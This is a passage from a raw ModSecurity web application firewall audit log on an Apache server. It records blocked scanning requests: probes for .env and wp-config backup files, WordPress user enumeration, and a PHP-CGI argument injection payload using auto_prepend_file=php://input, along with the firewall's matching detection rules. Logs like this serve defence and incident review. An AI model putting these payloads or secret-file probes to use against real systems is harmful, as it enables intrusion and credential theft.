"/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745343223882339 739 (- - -) Stopwatch2: 1745343223882339 739; combined=298, p1=260, p2=0, p3=0, p4=0, p5=38, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7a8d9168-Z-- --5d369a62-A-- [23/Apr/2025:00:33:58 +0700] aAfTBq3OiIHZ_gUDzTu7XQAAAM4 103.236.140.4 33794 103.236.140.4 8181 --5d369a62-B-- GET /web.config.gz HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 51.222.138.15 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 51.222.138.15 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 --5d369a62-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5d369a62-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/Web.config" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745343238386916 799 (- - -) Stopwatch2: 1745343238386916 799; combined=307, p1=269, p2=0, p3=0, p4=0, p5=38, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5d369a62-Z-- --ad737946-A-- [23/Apr/2025:01:55:38 +0700] aAfmKi3NG0xEq1F63-KL8gAAAFE 103.236.140.4 54896 103.236.140.4 8181 --ad737946-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 193.233.165.245 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 193.233.165.245 X-Forwarded-Proto: http Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --ad737946-C-- --ad737946-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ad737946-E-- --ad737946-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745348138459513 5283 (- - -) Stopwatch2: 1745348138459513 5283; combined=3592, p1=490, p2=3064, p3=0, p4=0, p5=38, sr=73, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ad737946-Z-- --a979844a-A-- [23/Apr/2025:02:43:32 +0700] aAfxZM0DNRaK3AYHswJ3JwAAABU 103.236.140.4 44922 103.236.140.4 8181 --a979844a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SAMSUNG SM-G935F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/9.4 Chrome/67.0.3396.87 Mobile Safari/537.36 Accept-Charset: utf-8 --a979844a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a979844a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745351012846606 708 (- - -) Stopwatch2: 1745351012846606 708; combined=269, p1=240, p2=0, p3=0, p4=0, p5=28, sr=59, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a979844a-Z-- --d18d8351-A-- [23/Apr/2025:02:46:31 +0700] aAfyFy3NG0xEq1F63-KUHgAAAEE 103.236.140.4 49494 103.236.140.4 8181 --d18d8351-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 64.227.70.2 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 64.227.70.2 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --d18d8351-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d18d8351-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745351191650069 849 (- - -) Stopwatch2: 1745351191650069 849; combined=364, p1=324, p2=0, p3=0, p4=0, p5=40, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d18d8351-Z-- --8f91b279-A-- [23/Apr/2025:02:58:46 +0700] aAf09q3OiIHZ_gUDzTvQuQAAAM4 103.236.140.4 34892 103.236.140.4 8181 --8f91b279-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 112.74.57.225 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 112.74.57.225 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --8f91b279-C-- --8f91b279-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8f91b279-E-- --8f91b279-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745351926764581 5036 (- - -) Stopwatch2: 1745351926764581 5036; combined=3706, p1=464, p2=3207, p3=0, p4=0, p5=35, sr=72, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8f91b279-Z-- --767fab11-A-- [23/Apr/2025:03:18:25 +0700] aAf5kV9gRrTzIZGIAfmHiQAAAJU 103.236.140.4 39638 103.236.140.4 8181 --767fab11-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 167.71.65.61 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 167.71.65.61 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --767fab11-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --767fab11-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745353105528546 737 (- - -) Stopwatch2: 1745353105528546 737; combined=307, p1=270, p2=0, p3=0, p4=0, p5=37, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --767fab11-Z-- --8a8b7338-A-- [23/Apr/2025:03:57:12 +0700] aAgCqNIw_rqnm4P5_acyFAAAAE0 103.236.140.4 48976 103.236.140.4 8181 --8a8b7338-B-- GET /wp-config.php.old HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 82.165.86.143 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 82.165.86.143 X-Forwarded-Proto: http Connection: close Accept: */* --8a8b7338-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8a8b7338-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745355432214490 794 (- - -) Stopwatch2: 1745355432214490 794; combined=301, p1=260, p2=0, p3=0, p4=0, p5=41, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8a8b7338-Z-- --5e2c0650-A-- [23/Apr/2025:04:09:25 +0700] aAgFhdIw_rqnm4P5_acy2QAAAEE 103.236.140.4 51924 103.236.140.4 8181 --5e2c0650-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.64 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; Redmi Note 5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36 Accept-Charset: utf-8 --5e2c0650-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5e2c0650-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745356165986265 781 (- - -) Stopwatch2: 1745356165986265 781; combined=310, p1=271, p2=0, p3=0, p4=0, p5=38, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5e2c0650-Z-- --abc1d218-A-- [23/Apr/2025:04:10:22 +0700] aAgFvhuwXEWV6ydgl53ogwAAAAo 103.236.140.4 52154 103.236.140.4 8181 --abc1d218-B-- GET /.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 45.148.10.172 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 45.148.10.172 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.42 Safari/537.36 Accept-Charset: utf-8 --abc1d218-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --abc1d218-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745356222629014 1075 (- - -) Stopwatch2: 1745356222629014 1075; combined=534, p1=495, p2=0, p3=0, p4=0, p5=39, sr=166, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --abc1d218-Z-- --377d3c00-A-- [23/Apr/2025:04:54:28 +0700] aAgQFD1ahuoJLEjKiAWrPwAAAI4 103.236.140.4 34600 103.236.140.4 8181 --377d3c00-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 168.63.153.176 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 168.63.153.176 X-Forwarded-Proto: http Connection: close Content-Type: text/html; charset=utf-8 --377d3c00-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --377d3c00-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745358868670488 833 (- - -) Stopwatch2: 1745358868670488 833; combined=295, p1=255, p2=0, p3=0, p4=0, p5=39, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --377d3c00-Z-- --b1ea146f-A-- [23/Apr/2025:07:07:05 +0700] aAgvKBuwXEWV6ydgl530NQAAABA 103.236.140.4 37948 103.236.140.4 8181 --b1ea146f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 103.77.107.153 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.77.107.153 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 Accept: */* Accept-Language: en-US,en;q=0.5 --b1ea146f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b1ea146f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745366824997131 3194 (- - -) Stopwatch2: 1745366824997131 3194; combined=1455, p1=491, p2=933, p3=0, p4=0, p5=31, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b1ea146f-Z-- --a1bbf21f-A-- [23/Apr/2025:07:07:25 +0700] aAgvPRuwXEWV6ydgl530QwAAABM 103.236.140.4 38036 103.236.140.4 8181 --a1bbf21f-B-- GET /wp-config.old HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.216.113.180 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.216.113.180 X-Forwarded-Proto: http Connection: close Accept: */* --a1bbf21f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a1bbf21f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.old" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745366845986971 907 (- - -) Stopwatch2: 1745366845986971 907; combined=391, p1=349, p2=0, p3=0, p4=0, p5=42, sr=142, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a1bbf21f-Z-- --be2cff16-A-- [23/Apr/2025:07:36:15 +0700] aAg1_z1ahuoJLEjKiAWy-wAAAIY 103.236.140.4 44988 103.236.140.4 8181 --be2cff16-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 164.90.208.56 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 164.90.208.56 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --be2cff16-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --be2cff16-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745368575508371 744 (- - -) Stopwatch2: 1745368575508371 744; combined=289, p1=255, p2=0, p3=0, p4=0, p5=34, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --be2cff16-Z-- --81547b5b-A-- [23/Apr/2025:08:26:40 +0700] aAhB0D1ahuoJLEjKiAW2RQAAAJQ 103.236.140.4 57178 103.236.140.4 8181 --81547b5b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 167.71.65.61 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 167.71.65.61 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --81547b5b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --81547b5b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745371600376386 902 (- - -) Stopwatch2: 1745371600376386 902; combined=425, p1=371, p2=0, p3=0, p4=0, p5=54, sr=131, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --81547b5b-Z-- --75eaab2b-A-- [23/Apr/2025:10:24:45 +0700] aAhdfT1ahuoJLEjKiAXBBgAAAIk 103.236.140.4 46016 103.236.140.4 8181 --75eaab2b-B-- GET /.env.config HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.178.110.161 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.178.110.161 X-Forwarded-Proto: http Connection: close User-Agent: l9explore/1.2.2 --75eaab2b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --75eaab2b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745378685787804 792 (- - -) Stopwatch2: 1745378685787804 792; combined=320, p1=280, p2=0, p3=0, p4=0, p5=40, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --75eaab2b-Z-- --e90b2234-A-- [23/Apr/2025:10:24:46 +0700] aAhdfjI97BrbgvDq16TjwQAAANE 103.236.140.4 46018 103.236.140.4 8181 --e90b2234-B-- GET /.env.secret HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.178.110.161 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.178.110.161 X-Forwarded-Proto: http Connection: close User-Agent: l9explore/1.2.2 --e90b2234-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e90b2234-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745378686126646 755 (- - -) Stopwatch2: 1745378686126646 755; combined=307, p1=272, p2=0, p3=0, p4=0, p5=35, sr=112, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e90b2234-Z-- --fefbc705-A-- [23/Apr/2025:10:24:46 +0700] aAhdfhuwXEWV6ydgl50GXgAAAAk 103.236.140.4 46024 103.236.140.4 8181 --fefbc705-B-- GET /prod/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.178.110.161 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.178.110.161 X-Forwarded-Proto: http Connection: close User-Agent: l9explore/1.2.2 --fefbc705-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fefbc705-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745378686463473 652 (- - -) Stopwatch2: 1745378686463473 652; combined=258, p1=224, p2=0, p3=0, p4=0, p5=34, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fefbc705-Z-- --16fa4667-A-- [23/Apr/2025:10:24:47 +0700] aAhdfz1ahuoJLEjKiAXBBwAAAIo 103.236.140.4 46030 103.236.140.4 8181 --16fa4667-B-- GET /.env.stage HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.178.110.161 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.178.110.161 X-Forwarded-Proto: http Connection: close User-Agent: l9explore/1.2.2 --16fa4667-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --16fa4667-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745378687486566 673 (- - -) Stopwatch2: 1745378687486566 673; combined=267, p1=234, p2=0, p3=0, p4=0, p5=33, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --16fa4667-Z-- --8b337d48-A-- [23/Apr/2025:10:24:48 +0700] aAhdgD1ahuoJLEjKiAXBCAAAAJE 103.236.140.4 46032 103.236.140.4 8181 --8b337d48-B-- GET /.env.template HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.178.110.161 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.178.110.161 X-Forwarded-Proto: http Connection: close User-Agent: l9explore/1.2.2 --8b337d48-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8b337d48-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745378688160663 630 (- - -) Stopwatch2: 1745378688160663 630; combined=254, p1=222, p2=0, p3=0, p4=0, p5=32, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8b337d48-Z-- --6564da54-A-- [23/Apr/2025:12:27:15 +0700] aAh6MxuwXEWV6ydgl50THAAAAAQ 103.236.140.4 35532 103.236.140.4 8181 --6564da54-B-- GET /wp-config.php.backup HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 108.167.189.34 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 